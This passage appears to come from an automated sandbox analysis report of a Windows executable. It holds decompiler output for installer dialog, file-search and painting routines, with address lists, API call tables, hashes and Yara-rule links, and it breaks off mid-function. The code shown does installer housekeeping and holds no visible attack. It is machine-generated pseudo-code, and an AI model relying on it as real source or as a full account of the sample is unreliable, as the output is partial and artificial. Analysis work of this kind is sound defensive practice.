                                                                                        			E0040263E(char __ebx, char* __edi, char* __esi) {
				void* _t19;

				if(FindFirstFileA(E004029F6(2), _t19 - 0x1a4) != 0xffffffff) {
					E00405AC4(__edi, _t6);
					_push(_t19 - 0x178);
					_push(__esi);
					E00405B66();
				} else {
					 *__edi = __ebx;
					 *__esi = __ebx;
					 *((intOrPtr*)(_t19 - 4)) = 1;
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}




                                                                                        0x00402656
                                                                                        0x0040266a
                                                                                        0x00402675
                                                                                        0x00402676
                                                                                        0x004027b1
                                                                                        0x00402658
                                                                                        0x00402658
                                                                                        0x0040265a
                                                                                        0x0040265c
                                                                                        0x0040265c
                                                                                        0x0040288e
                                                                                        0x0040289a

                                                                                        APIs
                                                                                        • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 0040264D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.210545063.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.210539038.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210567072.0000000000407000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210575310.0000000000409000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210598812.0000000000422000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210616720.0000000000429000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210650556.000000000042C000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: FileFindFirst
                                                                                        • String ID:
                                                                                        • API String ID: 1974802433-0
                                                                                        • Opcode ID: fec3e59c21f88b2afe0d858e3cd58f666a30441cfee8bf2827fa80150cba7d73
                                                                                        • Instruction ID: b3d2387cb92b068db8966d6a1439c3c253679041c8135bb289436d91baf53d0e
                                                                                        • Opcode Fuzzy Hash: fec3e59c21f88b2afe0d858e3cd58f666a30441cfee8bf2827fa80150cba7d73
                                                                                        • Instruction Fuzzy Hash: 42F0A072A04201DBD700EBB49A89AEEB7789B51328F60067BE111F20C1C6B85A459B2E
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00403A45, Relevance: 48.3, APIs: 32, Instructions: 345windowstringCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 83%
                                                                                        			E00403A45(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				struct HWND__* _v32;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				signed int _t37;
				signed int _t39;
				struct HWND__* _t49;
				signed int _t67;
				struct HWND__* _t73;
				signed int _t86;
				struct HWND__* _t91;
				signed int _t99;
				int _t103;
				signed int _t115;
				signed int _t116;
				int _t117;
				signed int _t122;
				struct HWND__* _t125;
				struct HWND__* _t126;
				int _t127;
				long _t130;
				int _t132;
				int _t133;
				void* _t134;

				_t115 = _a8;
				if(_t115 == 0x110 || _t115 == 0x408) {
					_t35 = _a12;
					_t125 = _a4;
					__eflags = _t115 - 0x110;
					 *0x420484 = _t35;
					if(_t115 == 0x110) {
						 *0x423ea8 = _t125;
						 *0x420498 = GetDlgItem(_t125, 1);
						_t91 = GetDlgItem(_t125, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x41f460 = _t91;
						E00403F18(_t125);
						SetClassLongA(_t125, 0xfffffff2,  *0x423688);
						 *0x42366c = E0040140B(4);
						_t35 = 1;
						__eflags = 1;
						 *0x420484 = 1;
					}
					_t122 =  *0x4091c4; // 0xffffffff
					_t133 = 0;
					_t130 = (_t122 << 6) +  *0x423ec0;
					__eflags = _t122;
					if(_t122 < 0) {
						L34:
						E00403F64(0x40b);
						while(1) {
							_t37 =  *0x420484;
							 *0x4091c4 =  *0x4091c4 + _t37;
							_t130 = _t130 + (_t37 << 6);
							_t39 =  *0x4091c4; // 0xffffffff
							__eflags = _t39 -  *0x423ec4;
							if(_t39 ==  *0x423ec4) {
								E0040140B(1);
							}
							__eflags =  *0x42366c - _t133;
							if( *0x42366c != _t133) {
								break;
							}
							__eflags =  *0x4091c4 -  *0x423ec4; // 0xffffffff
							if(__eflags >= 0) {
								break;
							}
							_t116 =  *(_t130 + 0x14);
							E00405B88(_t116, _t125, _t130, 0x42b800,  *((intOrPtr*)(_t130 + 0x24)));
							_push( *((intOrPtr*)(_t130 + 0x20)));
							_push(0xfffffc19);
							E00403F18(_t125);
							_push( *((intOrPtr*)(_t130 + 0x1c)));
							_push(0xfffffc1b);
							E00403F18(_t125);
							_push( *((intOrPtr*)(_t130 + 0x28)));
							_push(0xfffffc1a);
							E00403F18(_t125);
							_t49 = GetDlgItem(_t125, 3);
							__eflags =  *0x423f2c - _t133;
							_v32 = _t49;
							if( *0x423f2c != _t133) {
								_t116 = _t116 & 0x0000fefd | 0x00000004;
								__eflags = _t116;
							}
							ShowWindow(_t49, _t116 & 0x00000008);
							EnableWindow( *(_t134 + 0x30), _t116 & 0x00000100);
							E00403F3A(_t116 & 0x00000002);
							_t117 = _t116 & 0x00000004;
							EnableWindow( *0x41f460, _t117);
							__eflags = _t117 - _t133;
							if(_t117 == _t133) {
								_push(1);
							} else {
								_push(_t133);
							}
							EnableMenuItem(GetSystemMenu(_t125, _t133), 0xf060, ??);
							SendMessageA( *(_t134 + 0x38), 0xf4, _t133, 1);
							__eflags =  *0x423f2c - _t133;
							if( *0x423f2c == _t133) {
								_push( *0x420498);
							} else {
								SendMessageA(_t125, 0x401, 2, _t133);
								_push( *0x41f460);
							}
							E00403F4D();
							E00405B66(0x4204a0, 0x4236a0);
							E00405B88(0x4204a0, _t125, _t130,  &(0x4204a0[lstrlenA(0x4204a0)]),  *((intOrPtr*)(_t130 + 0x18)));
							SetWindowTextA(_t125, 0x4204a0);
							_push(_t133);
							_t67 = E00401389( *((intOrPtr*)(_t130 + 8)));
							__eflags = _t67;
							if(_t67 != 0) {
								continue;
							} else {
								__eflags =  *_t130 - _t133;
								if( *_t130 == _t133) {
									continue;
								}
								__eflags =  *(_t130 + 4) - 5;
								if( *(_t130 + 4) != 5) {
									DestroyWindow( *0x423678);
									 *0x41fc70 = _t130;
									__eflags =  *_t130 - _t133;
									if( *_t130 <= _t133) {
										goto L58;
									}
									_t73 = CreateDialogParamA( *0x423ea0,  *_t130 +  *0x423680 & 0x0000ffff, _t125,  *(0x4091c8 +  *(_t130 + 4) * 4), _t130);
									__eflags = _t73 - _t133;
									 *0x423678 = _t73;
									if(_t73 == _t133) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t130 + 0x2c)));
									_push(6);
									E00403F18(_t73);
									GetWindowRect(GetDlgItem(_t125, 0x3fa), _t134 + 0x10);
									ScreenToClient(_t125, _t134 + 0x10);
									SetWindowPos( *0x423678, _t133,  *(_t134 + 0x20),  *(_t134 + 0x20), _t133, _t133, 0x15);
									_push(_t133);
									E00401389( *((intOrPtr*)(_t130 + 0xc)));
									__eflags =  *0x42366c - _t133;
									if( *0x42366c != _t133) {
										goto L61;
									}
									ShowWindow( *0x423678, 8);
									E00403F64(0x405);
									goto L58;
								}
								__eflags =  *0x423f2c - _t133;
								if( *0x423f2c != _t133) {
									goto L61;
								}
								__eflags =  *0x423f20 - _t133;
								if( *0x423f20 != _t133) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x423678);
						 *0x423ea8 = _t133;
						EndDialog(_t125,  *0x41f868);
						goto L58;
					} else {
						__eflags = _t35 - 1;
						if(_t35 != 1) {
							L33:
							__eflags =  *_t130 - _t133;
							if( *_t130 == _t133) {
								goto L61;
							}
							goto L34;
						}
						_push(0);
						_t86 = E00401389( *((intOrPtr*)(_t130 + 0x10)));
						__eflags = _t86;
						if(_t86 == 0) {
							goto L33;
						}
						SendMessageA( *0x423678, 0x40f, 0, 1);
						__eflags =  *0x42366c;
						return 0 |  *0x42366c == 0x00000000;
					}
				} else {
					_t125 = _a4;
					_t133 = 0;
					if(_t115 == 0x47) {
						SetWindowPos( *0x420478, _t125, 0, 0, 0, 0, 0x13);
					}
					if(_t115 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x420478,  ~(_a12 - 1) & _t115);
					}
					if(_t115 != 0x40d) {
						__eflags = _t115 - 0x11;
						if(_t115 != 0x11) {
							__eflags = _t115 - 0x111;
							if(_t115 != 0x111) {
								L26:
								return E00403F7F(_t115, _a12, _a16);
							}
							_t132 = _a12 & 0x0000ffff;
							_t126 = GetDlgItem(_t125, _t132);
							__eflags = _t126 - _t133;
							if(_t126 == _t133) {
								L13:
								__eflags = _t132 - 1;
								if(_t132 != 1) {
									__eflags = _t132 - 3;
									if(_t132 != 3) {
										_t127 = 2;
										__eflags = _t132 - _t127;
										if(_t132 != _t127) {
											L25:
											SendMessageA( *0x423678, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x423f2c - _t133;
										if( *0x423f2c == _t133) {
											_t99 = E0040140B(3);
											__eflags = _t99;
											if(_t99 != 0) {
												goto L26;
											}
											 *0x41f868 = 1;
											L21:
											_push(0x78);
											L22:
											E00403EF1();
											goto L26;
										}
										E0040140B(_t127);
										 *0x41f868 = _t127;
										goto L21;
									}
									__eflags =  *0x4091c4 - _t133; // 0xffffffff
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t132);
								goto L22;
							}
							SendMessageA(_t126, 0xf3, _t133, _t133);
							_t103 = IsWindowEnabled(_t126);
							__eflags = _t103;
							if(_t103 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongA(_t125, _t133, _t133);
						return 1;
					} else {
						DestroyWindow( *0x423678);
						 *0x423678 = _a12;
						L58:
						if( *0x4214a0 == _t133 &&  *0x423678 != _t133) {
							ShowWindow(_t125, 0xa);
							 *0x4214a0 = 1;
						}
						L61:
						return 0;
					}
				}
			}






























                                                                                        0x00403a4e
                                                                                        0x00403a57
                                                                                        0x00403b98
                                                                                        0x00403b9c
                                                                                        0x00403ba0
                                                                                        0x00403ba2
                                                                                        0x00403ba7
                                                                                        0x00403bb2
                                                                                        0x00403bbd
                                                                                        0x00403bc2
                                                                                        0x00403bc4
                                                                                        0x00403bc6
                                                                                        0x00403bc9
                                                                                        0x00403bce
                                                                                        0x00403bdc
                                                                                        0x00403be9
                                                                                        0x00403bf0
                                                                                        0x00403bf0
                                                                                        0x00403bf1
                                                                                        0x00403bf1
                                                                                        0x00403bf6
                                                                                        0x00403bfc
                                                                                        0x00403c03
                                                                                        0x00403c09
                                                                                        0x00403c0b
                                                                                        0x00403c4b
                                                                                        0x00403c50
                                                                                        0x00403c55
                                                                                        0x00403c55
                                                                                        0x00403c5a
                                                                                        0x00403c63
                                                                                        0x00403c65
                                                                                        0x00403c6a
                                                                                        0x00403c70
                                                                                        0x00403c74
                                                                                        0x00403c74
                                                                                        0x00403c79
                                                                                        0x00403c7f
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00403c8a
                                                                                        0x00403c90
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00403c99
                                                                                        0x00403ca1
                                                                                        0x00403ca6
                                                                                        0x00403ca9
                                                                                        0x00403caf
                                                                                        0x00403cb4
                                                                                        0x00403cb7
                                                                                        0x00403cbd
                                                                                        0x00403cc2
                                                                                        0x00403cc5
                                                                                        0x00403ccb
                                                                                        0x00403cd3
                                                                                        0x00403cd9
                                                                                        0x00403cdf
                                                                                        0x00403ce3
                                                                                        0x00403cea
                                                                                        0x00403cea
                                                                                        0x00403cea
                                                                                        0x00403cf4
                                                                                        0x00403d06
                                                                                        0x00403d12
                                                                                        0x00403d17
                                                                                        0x00403d21
                                                                                        0x00403d27
                                                                                        0x00403d29
                                                                                        0x00403d2e
                                                                                        0x00403d2b
                                                                                        0x00403d2b
                                                                                        0x00403d2b
                                                                                        0x00403d3e
                                                                                        0x00403d56
                                                                                        0x00403d58
                                                                                        0x00403d5e
                                                                                        0x00403d73
                                                                                        0x00403d60
                                                                                        0x00403d69
                                                                                        0x00403d6b
                                                                                        0x00403d6b
                                                                                        0x00403d79
                                                                                        0x00403d89
                                                                                        0x00403d9a
                                                                                        0x00403da1
                                                                                        0x00403da7
                                                                                        0x00403dab
                                                                                        0x00403db0
                                                                                        0x00403db2
                                                                                        0x00000000
                                                                                        0x00403db8
                                                                                        0x00403db8
                                                                                        0x00403dba
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00403dc0
                                                                                        0x00403dc4
                                                                                        0x00403de9
                                                                                        0x00403def
                                                                                        0x00403df5
                                                                                        0x00403df7
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00403e1d
                                                                                        0x00403e23
                                                                                        0x00403e25
                                                                                        0x00403e2a
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00403e30
                                                                                        0x00403e33
                                                                                        0x00403e36
                                                                                        0x00403e4d
                                                                                        0x00403e59
                                                                                        0x00403e72
                                                                                        0x00403e78
                                                                                        0x00403e7c
                                                                                        0x00403e81
                                                                                        0x00403e87
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00403e91
                                                                                        0x00403e9c
                                                                                        0x00000000
                                                                                        0x00403e9c
                                                                                        0x00403dc6
                                                                                        0x00403dcc
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00403dd2
                                                                                        0x00403dd8
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00403dde
                                                                                        0x00403db2
                                                                                        0x00403ea9
                                                                                        0x00403eb5
                                                                                        0x00403ebc
                                                                                        0x00000000
                                                                                        0x00403c0d
                                                                                        0x00403c0d
                                                                                        0x00403c10
                                                                                        0x00403c43
                                                                                        0x00403c43
                                                                                        0x00403c45
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00403c45
                                                                                        0x00403c12
                                                                                        0x00403c16
                                                                                        0x00403c1b
                                                                                        0x00403c1d
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00403c2d
                                                                                        0x00403c35
                                                                                        0x00000000
                                                                                        0x00403c3b
                                                                                        0x00403a69
                                                                                        0x00403a69
                                                                                        0x00403a6d
                                                                                        0x00403a72
                                                                                        0x00403a81
                                                                                        0x00403a81
                                                                                        0x00403a8a
                                                                                        0x00403a93
                                                                                        0x00403a9e
                                                                                        0x00403a9e
                                                                                        0x00403aaa
                                                                                        0x00403ac6
                                                                                        0x00403ac9
                                                                                        0x00403adc
                                                                                        0x00403ae2
                                                                                        0x00403b85
                                                                                        0x00000000
                                                                                        0x00403b8e
                                                                                        0x00403ae8
                                                                                        0x00403af5
                                                                                        0x00403af7
                                                                                        0x00403af9
                                                                                        0x00403b18
                                                                                        0x00403b18
                                                                                        0x00403b1b
                                                                                        0x00403b20
                                                                                        0x00403b23
                                                                                        0x00403b33
                                                                                        0x00403b34
                                                                                        0x00403b36
                                                                                        0x00403b6c
                                                                                        0x00403b7f
                                                                                        0x00000000
                                                                                        0x00403b7f
                                                                                        0x00403b38
                                                                                        0x00403b3e
                                                                                        0x00403b57
                                                                                        0x00403b5c
                                                                                        0x00403b5e
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00403b60
                                                                                        0x00403b4c
                                                                                        0x00403b4c
                                                                                        0x00403b4e
                                                                                        0x00403b4e
                                                                                        0x00000000
                                                                                        0x00403b4e
                                                                                        0x00403b41
                                                                                        0x00403b46
                                                                                        0x00000000
                                                                                        0x00403b46
                                                                                        0x00403b25
                                                                                        0x00403b2b
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00403b2d
                                                                                        0x00000000
                                                                                        0x00403b2d
                                                                                        0x00403b1d
                                                                                        0x00000000
                                                                                        0x00403b1d
                                                                                        0x00403b03
                                                                                        0x00403b0a
                                                                                        0x00403b10
                                                                                        0x00403b12
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00403b12
                                                                                        0x00403ace
                                                                                        0x00000000
                                                                                        0x00403aac
                                                                                        0x00403ab2
                                                                                        0x00403abc
                                                                                        0x00403ec2
                                                                                        0x00403ec8
                                                                                        0x00403ed5
                                                                                        0x00403edb
                                                                                        0x00403edb
                                                                                        0x00403ee5
                                                                                        0x00000000
                                                                                        0x00403ee5
                                                                                        0x00403aaa

                                                                                        APIs
                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403A81
                                                                                        • ShowWindow.USER32(?), ref: 00403A9E
                                                                                        • DestroyWindow.USER32 ref: 00403AB2
                                                                                        • SetWindowLongA.USER32 ref: 00403ACE
                                                                                        • GetDlgItem.USER32 ref: 00403AEF
                                                                                        • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403B03
                                                                                        • IsWindowEnabled.USER32(00000000), ref: 00403B0A
                                                                                        • GetDlgItem.USER32 ref: 00403BB8
                                                                                        • GetDlgItem.USER32 ref: 00403BC2
                                                                                        • SetClassLongA.USER32(?,000000F2,?,0000001C,000000FF), ref: 00403BDC
                                                                                        • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403C2D
                                                                                        • GetDlgItem.USER32 ref: 00403CD3
                                                                                        • ShowWindow.USER32(00000000,?), ref: 00403CF4
                                                                                        • EnableWindow.USER32(?,?), ref: 00403D06
                                                                                        • EnableWindow.USER32(?,?), ref: 00403D21
                                                                                        • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403D37
                                                                                        • EnableMenuItem.USER32 ref: 00403D3E
                                                                                        • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403D56
                                                                                        • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403D69
                                                                                        • lstrlenA.KERNEL32(004204A0,?,004204A0,004236A0), ref: 00403D92
                                                                                        • SetWindowTextA.USER32(?,004204A0), ref: 00403DA1
                                                                                        • ShowWindow.USER32(?,0000000A), ref: 00403ED5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.210545063.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.210539038.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210567072.0000000000407000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210575310.0000000000409000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210598812.0000000000422000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210616720.0000000000429000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210650556.000000000042C000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                                        • String ID:
                                                                                        • API String ID: 184305955-0
                                                                                        • Opcode ID: 14e7e0a8131732f9e150b36a7fce0cb21c204cb0cec2561e24870ec1d01c69b9
                                                                                        • Instruction ID: 1b558320748e03173a152966608fa9e4bba3452d5179f8dde3fdb5243a6fbb8a
                                                                                        • Opcode Fuzzy Hash: 14e7e0a8131732f9e150b36a7fce0cb21c204cb0cec2561e24870ec1d01c69b9
                                                                                        • Instruction Fuzzy Hash: 21C18071A04204BBDB216F21ED45E2B3E7DEB4970AF40053EF541B12E1C739AA42DB6E
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00404060, Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 204windowstringCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 93%
                                                                                        			E00404060(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
				char _v8;
				signed int _v12;
				void* _v16;
				struct HWND__* _t52;
				long _t86;
				int _t98;
				struct HWND__* _t99;
				signed int _t100;
				intOrPtr _t109;
				int _t110;
				signed int* _t112;
				signed int _t113;
				char* _t114;
				CHAR* _t115;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L11:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x420480 =  *0x420480 + 1;
							}
							L25:
							_t110 = _a16;
							L26:
							return E00403F7F(_a8, _a12, _t110);
						}
						_t52 = GetDlgItem(_a4, 0x3e8);
						_t110 = _a16;
						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
							_t109 =  *((intOrPtr*)(_t110 + 0x18));
							_v12 = _t100;
							_v16 = _t109;
							_v8 = 0x422e40;
							if(_t100 - _t109 < 0x800) {
								SendMessageA(_t52, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorA(0, 0x7f02));
								_t40 =  &_v8; // 0x422e40
								ShellExecuteA(_a4, "open",  *_t40, 0, 0, 1);
								SetCursor(LoadCursorA(0, 0x7f00));
								_t110 = _a16;
							}
						}
						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
							goto L26;
						} else {
							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
								SendMessageA( *0x423ea8, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
								SendMessageA( *0x423ea8, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x420480 != 0) {
						goto L25;
					} else {
						_t112 =  *0x41fc70 + 0x14;
						if(( *_t112 & 0x00000020) == 0) {
							goto L25;
						}
						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E00403F3A(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E004042EB();
						goto L11;
					}
				}
				_t98 = _a16;
				_t113 =  *(_t98 + 0x30);
				if(_t113 < 0) {
					_t113 =  *( *0x42367c - 4 + _t113 * 4);
				}
				_push( *((intOrPtr*)(_t98 + 0x34)));
				_t114 = _t113 +  *0x423ed8;
				_push(0x22);
				_a16 =  *_t114;
				_v12 = _v12 & 0x00000000;
				_t115 = _t114 + 1;
				_v16 = _t115;
				_v8 = E0040402C;
				E00403F18(_a4);
				_push( *((intOrPtr*)(_t98 + 0x38)));
				_push(0x23);
				E00403F18(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E00403F3A( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
				_t99 = GetDlgItem(_a4, 0x3e8);
				E00403F4D(_t99);
				SendMessageA(_t99, 0x45b, 1, 0);
				_t86 =  *( *0x423eb0 + 0x68);
				if(_t86 < 0) {
					_t86 = GetSysColor( ~_t86);
				}
				SendMessageA(_t99, 0x443, 0, _t86);
				SendMessageA(_t99, 0x445, 0, 0x4010000);
				 *0x41f464 =  *0x41f464 & 0x00000000;
				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
				SendMessageA(_t99, 0x449, _a16,  &_v16);
				 *0x420480 =  *0x420480 & 0x00000000;
				return 0;
			}

















                                                                                        0x00404070
                                                                                        0x00404196
                                                                                        0x004041f2
                                                                                        0x004041f6
                                                                                        0x004042cd
                                                                                        0x004042cf
                                                                                        0x004042cf
                                                                                        0x004042d5
                                                                                        0x004042d5
                                                                                        0x004042d8
                                                                                        0x00000000
                                                                                        0x004042df
                                                                                        0x00404204
                                                                                        0x00404206
                                                                                        0x00404210
                                                                                        0x0040421b
                                                                                        0x0040421e
                                                                                        0x00404221
                                                                                        0x0040422c
                                                                                        0x0040422f
                                                                                        0x00404236
                                                                                        0x00404244
                                                                                        0x0040425c
                                                                                        0x00404264
                                                                                        0x0040426f
                                                                                        0x0040427f
                                                                                        0x00404281
                                                                                        0x00404281
                                                                                        0x00404236
                                                                                        0x0040428b
                                                                                        0x00000000
                                                                                        0x00404296
                                                                                        0x0040429a
                                                                                        0x004042ab
                                                                                        0x004042ab
                                                                                        0x004042b1
                                                                                        0x004042bf
                                                                                        0x004042bf
                                                                                        0x00000000
                                                                                        0x004042c3
                                                                                        0x0040428b
                                                                                        0x004041a1
                                                                                        0x00000000
                                                                                        0x004041b5
                                                                                        0x004041bb
                                                                                        0x004041c1
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004041e6
                                                                                        0x004041e8
                                                                                        0x004041ed
                                                                                        0x00000000
                                                                                        0x004041ed
                                                                                        0x004041a1
                                                                                        0x00404076
                                                                                        0x00404079
                                                                                        0x0040407e
                                                                                        0x0040408f
                                                                                        0x0040408f
                                                                                        0x00404096
                                                                                        0x00404099
                                                                                        0x0040409b
                                                                                        0x004040a0
                                                                                        0x004040a9
                                                                                        0x004040af
                                                                                        0x004040bb
                                                                                        0x004040be
                                                                                        0x004040c7
                                                                                        0x004040cc
                                                                                        0x004040cf
                                                                                        0x004040d4
                                                                                        0x004040eb
                                                                                        0x004040f2
                                                                                        0x00404105
                                                                                        0x00404108
                                                                                        0x0040411d
                                                                                        0x00404124
                                                                                        0x00404129
                                                                                        0x0040412e
                                                                                        0x0040412e
                                                                                        0x0040413d
                                                                                        0x0040414c
                                                                                        0x0040414e
                                                                                        0x00404164
                                                                                        0x00404173
                                                                                        0x00404175
                                                                                        0x00000000

                                                                                        APIs
                                                                                        • CheckDlgButton.USER32 ref: 004040EB
                                                                                        • GetDlgItem.USER32 ref: 004040FF
                                                                                        • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 0040411D
                                                                                        • GetSysColor.USER32(?), ref: 0040412E
                                                                                        • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 0040413D
                                                                                        • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 0040414C
                                                                                        • lstrlenA.KERNEL32(?), ref: 00404156
                                                                                        • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00404164
                                                                                        • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00404173
                                                                                        • GetDlgItem.USER32 ref: 004041D6
                                                                                        • SendMessageA.USER32(00000000), ref: 004041D9
                                                                                        • GetDlgItem.USER32 ref: 00404204
                                                                                        • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 00404244
                                                                                        • LoadCursorA.USER32 ref: 00404253
                                                                                        • SetCursor.USER32(00000000), ref: 0040425C
                                                                                        • ShellExecuteA.SHELL32(0000070B,open,@.B,00000000,00000000,00000001), ref: 0040426F
                                                                                        • LoadCursorA.USER32 ref: 0040427C
                                                                                        • SetCursor.USER32(00000000), ref: 0040427F
                                                                                        • SendMessageA.USER32(00000111,00000001,00000000), ref: 004042AB
                                                                                        • SendMessageA.USER32(00000010,00000000,00000000), ref: 004042BF
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.210545063.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.210539038.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210567072.0000000000407000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210575310.0000000000409000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210598812.0000000000422000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210616720.0000000000429000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210650556.000000000042C000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                        • String ID: @.B$N$open
                                                                                        • API String ID: 3615053054-3815657624
                                                                                        • Opcode ID: e8b988e3949f0b6d91b1b58256fef292242953983a672fd1ea6cb44b2e1e2ed0
                                                                                        • Instruction ID: 7761d7a6ce13443680711406d70bf9c6d022160e69bfd2fffc9b265f6460a43d
                                                                                        • Opcode Fuzzy Hash: e8b988e3949f0b6d91b1b58256fef292242953983a672fd1ea6cb44b2e1e2ed0
                                                                                        • Instruction Fuzzy Hash: 4661B2B1A40209BFEB109F60DC45F6A3B69FB44755F10817AFB04BA2D1C7B8A951CF98
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00401000, Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 90%
                                                                                        			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x423eb0;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
